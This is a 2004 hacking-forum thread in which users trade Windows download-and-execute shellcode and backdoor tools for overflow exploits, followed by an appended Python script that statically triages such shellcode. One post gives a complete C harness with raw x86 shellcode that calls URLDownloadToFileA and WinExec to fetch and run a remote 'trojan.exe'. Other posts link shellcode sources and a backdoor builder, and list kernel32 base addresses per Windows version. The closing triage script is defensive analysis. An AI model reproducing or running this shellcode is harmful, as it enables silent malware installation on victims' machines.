Full Version: Specific Shellcode
vnet576
I'm looking for a specific shellcode that will download a file from an FTP or HTTP server (don't remember which) onto a system and execute it. I remember seeing that shellcode in a previous exploit; that's why I know that it exists, I just don't remember which one. If anybody knows which one I'm talking about, let me know... also, if possible, documentation for that specific shellcode.
boshcash
See http://www.metasploit.com, I think it has something like this...
vnet576
QUOTE (boshcash @ Feb 10 2004, 04:57 PM)
See http://www.metasploit.com, I think it has something like this...

Yeah, I already checked that site. The first one seemed like what I wanted at first, but the shellcode isn't designed for FTP, since it doesn't have anything built in to handle the FTP protocol: no user/pass support, etc. Nor does it look like it downloads from HTTP servers either...

Perhaps I'm wrong on this one; here is the asm source of the one that is supposed to download a payload:

http://metasploit.com/sc/win2000_vampiric_connector.asm
sPiKie
If I'm not right, you can go and visit http://www.elitehaven.net, a cool guy. He uses HTTP to download ncat.exe and execute it with some parameters.
vnet576
QUOTE (sPiKie @ Feb 10 2004, 05:13 PM)
If I'm not right, you can go and visit http://www.elitehaven.net, a cool guy. He uses HTTP to download ncat.exe and execute it with some parameters.

Thanks... the guy has some cool shellcodes. The "My Generic URL Download + Exec. ShellCode For WinXP" seems to be what I'm looking for; gonna try it out.
sPiKie
Peter Winter Smith, he is a respected man. I have sent/received a lot of mails from him.
He is a sort of friend.
Btw, my MyDoom.A Upload/Exec tool thread got a kind of "overflow".
ipc$hacker
QUOTE (vnet576 @ Feb 10 2004, 10:19 PM)
QUOTE (sPiKie @ Feb 10 2004, 05:13 PM)
If I'm not right, you can go and visit http://www.elitehaven.net, a cool guy. He uses HTTP to download ncat.exe and execute it with some parameters.

Thanks... the guy has some cool shellcodes. The "My Generic URL Download + Exec. ShellCode For WinXP" seems to be what I'm looking for; gonna try it out.

Does this work, finally?
basepart
Hi,
If I'm getting this right, have you ever tried winshell?
It's an old one, but it's one of my favorites.
I've been using it for a year and I like it because it's pretty stable.
The main program produces an exe file (server) with your preferred settings built in (password, port, service name, reg key name, file to download and execute from a web server at startup, etc.).
The server file is around 13300 bytes big, UPXed and Morphined.
Maybe you want to take a look at it.

http://www.janker.org/zuopin/winshell.zip
Lusty
Yeah... I'll take a look at it... Wanna see if I can make it work.
karate
He is not requesting a backdoor like winshell, but a shellcode.

Dunno if it works, but I have this in my saves:

QUOTE
int main ()
{
    // Generated by Hex Workshop
    // essai5.exe - Starting Offset: 4102 (0x00001006) Length: 247 (0x000000F7)

    // Raw shellcode bytes; the trailing string literal is the URL the stub fetches from.
    unsigned char rawData[] = {
        "\xEB\x72\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1"
        "\x8B\x5C\x24\x08\x8B\x70\x30\x03\x74\x24\x04\x38\x1E\x75\x4C\x8B"
        "\x40\x18\x8B\x58\x3C\x03\xD8\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03"
        "\xF0\x56\x8B\x73\x24\x03\xF0\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18"
        "\x4B\x8B\x34\x9A\x03\xF0\x03\x74\x24\x14\x8B\x36\x3B\x74\x24\x18"
        "\x74\x0A\x4B\x23\xDB\x75\xEA\x58\x58\x33\xC0\xC3\x5F\x33\xC9\x66"
        "\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04\x07\xC3\x8B\x18\x8B\xC3\x3B"
        "\xC1\x75\x9D\xC3\xEB\x7C\x33\xDB\x68\x79\x45\x78\x41\x6A\x0A\x6A"
        "\x4B\x53\xE8\x7B\xFF\xFF\xFF\x33\xC9\x51\x68\x75\x72\x6C\x6D\x66"
        "\xC7\x44\x24\x04\x6F\x6E\x8B\xEC\x51\x51\x55\xFF\xD0\x68\x69\x6C"
        "\x65\x41\x6A\x0E\x6A\x72\x6A\x02\xE8\x55\xFF\xFF\xFF\x33\xDB\x53"
        "\x68\x61\x2E\x65\x78\xC6\x44\x24\x04\x65\x8B\xCC\x53\x53\x51\xFF"
        "\x75\x18\x53\xFF\xD0\x33\xDB\x68\x69\x6E\x45\x78\x6A\x01\x6A\x4B"
        "\x53\xE8\x2C\xFF\xFF\xFF\x8D\x4C\x24\x10\x6A\x01\x51\xFF\xD0\x33"
        "\xDB\x68\x78\x69\x74\x50\x6A\x01\x6A\x4B\x53\xE8\x12\xFF\xFF\xFF"
        "\xFF\xD0\xE8\x7F\xFF\xFF\xFF"
        "http://www.chez.com/mvm/trojan.exe"
    };

    // Treat the byte array as a function and jump into it.
    void (*shellcode) () = (void *) rawData;
    shellcode ();

    return 0;
}


Please report your test, and post the shellcode you like if you test it and find it works!
vnet576
The shellcode from Elite Haven works well. It says that it's for Windows XP only, but I don't have Win2k or 2k3 to see if it'll work on those as well. I also found another program that automates the process. The advantage of this is that it automatically compiles and converts the shellcode to hexadecimal format. Other than that, they both work well.
http://www.delikon.de/zips/shellcode-v2.0.zip

Basepart, thanks, but that program is not a shellcode. It's still a good prog though.

I'll test your shellcode out, karate, and I'll reply if it works.
karate
Thx vnet576, interesting info.
zero-maitimax
What kind of shell are you coding for??
vnet576
QUOTE (zero-maitimax @ Feb 16 2004, 06:19 AM)
What kind of shell are you coding for??

Just getting the basics of incorporating different types of shellcode into different exploits. No, nothing as complicated as ASN, just very basic overflow exploits with different shellcodes.
karate
http://www.harmonysecurity.com/kungfoo.html

Explains the principle of a fully compatible shellcode, but the project is still in development.

Looks like shellcode has to be specific to the OS version!

Windows Version                   Kernel Base Address
Win95                             0xBFF70000
Win98 (1st and 2nd editions)      0xBFF70000
WinME                             0xBFF60000
WinNT (service pack 4 and 5)      0x77F00000
WinXP                             0x77E60000
Win2K (service pack 1, 2 and 3)   0x77E80000
Win2003 Web Edition               0x77E40000

Isn't there somewhere a universal shellcode for all Windows versions (that downloads and executes...)?
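Added example, not from anyone in this thread: a small static triage script for raw x86 blobs of the two kinds discussed above, i.e. karate's posted download-and-execute stub and the "universal vs. OS-specific" question. It checks three things a defender wants to know about such a blob before anything else: whether it locates kernel32 through the PEB (version-independent) or embeds one of the kernel base addresses from the table in this thread (works on one OS only), which DLL/API names it assembles on the stack with "push imm32" and a short "[esp+4]" fix-up, and whether it carries a URL. The sample bytes, the URL, and the DLL/API keyword lists are constructed for this example; the base-address table is the one posted above.

```python
import re

# Constructed samples, not the shellcode posted in the thread.
# SAMPLE_PEB imitates a position-independent download-and-execute stub: it reaches
# kernel32 through the PEB, builds DLL/API names on the stack with "push imm32" plus a
# short [esp+4] fix-up, and carries its URL as trailing ASCII.
# SAMPLE_FIXED instead starts from a hardcoded kernel32 base of the kind in the table above.
SAMPLE_PEB = (
    b"\x6A\x30\x5B\x64\x8B\x03"                # push 30h ; pop ebx ; mov eax, fs:[ebx]
    b"\x8B\x40\x0C\x8B\x48\x0C"                # mov eax, [eax+0Ch] ; mov ecx, [eax+0Ch]
    b"\x68urlm" b"\x66\xC7\x44\x24\x04on"      # push 'urlm' ; mov word [esp+4], 'on'
    b"\xFF\xD0"                                # call eax
    b"\x68ileA" b"\xFF\xD0"                    # push 'ileA' (tail of URLDownloadToFileA) ; call eax
    b"\x68a.ex" b"\xC6\x44\x24\x04e"           # push 'a.ex' ; mov byte [esp+4], 'e'
    b"\x68inEx" b"\xFF\xD0"                    # push 'inEx' (tail of WinExec) ; call eax
    b"\x68xitP" b"\xFF\xD0"                    # push 'xitP' (from ExitProcess) ; call eax
    b"http://example.invalid/payload.exe\x00"  # constructed URL, plain ASCII at the end
)
SAMPLE_FIXED = b"\xB8\x00\x00\xE6\x77\x8B\x40\x3C"  # mov eax, 77E60000h ; mov eax, [eax+3Ch]

# Common ways of reading the PEB pointer at fs:[30h]; any of them marks a version-independent stub.
PEB_ACCESS_PATTERNS = [
    b"\x64\xA1\x30\x00\x00\x00",      # mov eax, fs:[30h]
    b"\x64\x8B\x1D\x30\x00\x00\x00",  # mov ebx, fs:[30h]
    b"\x6A\x30\x5B\x64\x8B\x03",      # push 30h ; pop ebx ; mov eax, fs:[ebx]
    b"\x6A\x30\x58\x64\x8B\x00",      # push 30h ; pop eax ; mov eax, fs:[eax]
]

# kernel32 base addresses from the table posted in this thread (little-endian when embedded).
KERNEL_BASES = {
    0xBFF70000: "Win95/Win98",
    0xBFF60000: "WinME",
    0x77F00000: "WinNT SP4/SP5",
    0x77E60000: "WinXP",
    0x77E80000: "Win2K SP1-SP3",
    0x77E40000: "Win2003 Web Edition",
}

# Assumed keyword lists for matching the 4-6 byte fragments such stubs push; extend as needed.
KNOWN_DLLS = ["urlmon", "kernel32", "wininet", "ws2_32", "shell32"]
KNOWN_APIS = ["LoadLibraryA", "URLDownloadToFileA", "WinExec", "CreateProcessA",
              "ShellExecuteA", "ExitProcess"]
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def _printable(chunk, n):
    return len(chunk) == n and all(0x20 <= b < 0x7F for b in chunk)


def extract_pushed_strings(buf):
    """Reassemble strings built on the stack with push imm32 (68 xx xx xx xx), including the
    'mov word/byte [esp+4], imm' fix-up that completes a 5- or 6-byte name."""
    out, i = [], 0
    while i < len(buf):
        if buf[i] == 0x68 and _printable(buf[i + 1:i + 5], 4):
            s, j = buf[i + 1:i + 5], i + 5
            if buf[j:j + 5] == b"\x66\xC7\x44\x24\x04" and _printable(buf[j + 5:j + 7], 2):
                s, j = s + buf[j + 5:j + 7], j + 7
            elif buf[j:j + 4] == b"\xC6\x44\x24\x04" and _printable(buf[j + 4:j + 5], 1):
                s, j = s + buf[j + 4:j + 5], j + 5
            out.append(s.decode("ascii"))
            i = j
        else:
            i += 1
    return out


def find_hardcoded_bases(buf):
    """Flag 32-bit immediates equal to a known kernel32 base: such a stub only works on that OS."""
    return [KERNEL_BASES[v] for v in
            (int.from_bytes(buf[i:i + 4], "little") for i in range(len(buf) - 3))
            if v in KERNEL_BASES]


def triage(buf):
    """Static report for a raw x86 blob: how it finds kernel32, which names it builds,
    and whether the combination looks like a download-and-execute stub."""
    urls = [u.decode("ascii") for u in URL_RE.findall(buf)]
    # Mask the URL bytes first: 'h' is 0x68, so "http" would otherwise look like a push.
    masked = URL_RE.sub(lambda m: b"\x00" * len(m.group(0)), buf)
    frags = extract_pushed_strings(masked)
    dlls = sorted({d for d in KNOWN_DLLS for f in frags if f in d})
    apis = sorted({a for a in KNOWN_APIS for f in frags if f in a})
    fetches = "urlmon" in dlls or "URLDownloadToFileA" in apis
    runs = any(a in apis for a in ("WinExec", "CreateProcessA", "ShellExecuteA"))
    return {
        "peb_walk": any(p in buf for p in PEB_ACCESS_PATTERNS),
        "hardcoded_bases": find_hardcoded_bases(buf),
        "urls": urls,
        "fragments": frags,
        "dlls": dlls,
        "apis": apis,
        "download_and_execute": bool(urls) and fetches and runs,
    }


if __name__ == "__main__":
    for name, blob in (("SAMPLE_PEB", SAMPLE_PEB), ("SAMPLE_FIXED", SAMPLE_FIXED)):
        print(name, triage(blob))
```

Run it on a blob pulled out of a crash dump or a captured exploit and you get the URL and the API set without executing anything. The fragment matching is deliberately loose (4-byte substrings), so treat "apis" as leads for a disassembler pass rather than proof; the PEB/hardcoded-base split, on the other hand, is reliable and tells you directly whether the sample is the "universal" kind asked about above or tied to one of the bases in the table.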
Invision Power Board © 2001-2005 Invision Power Services, Inc.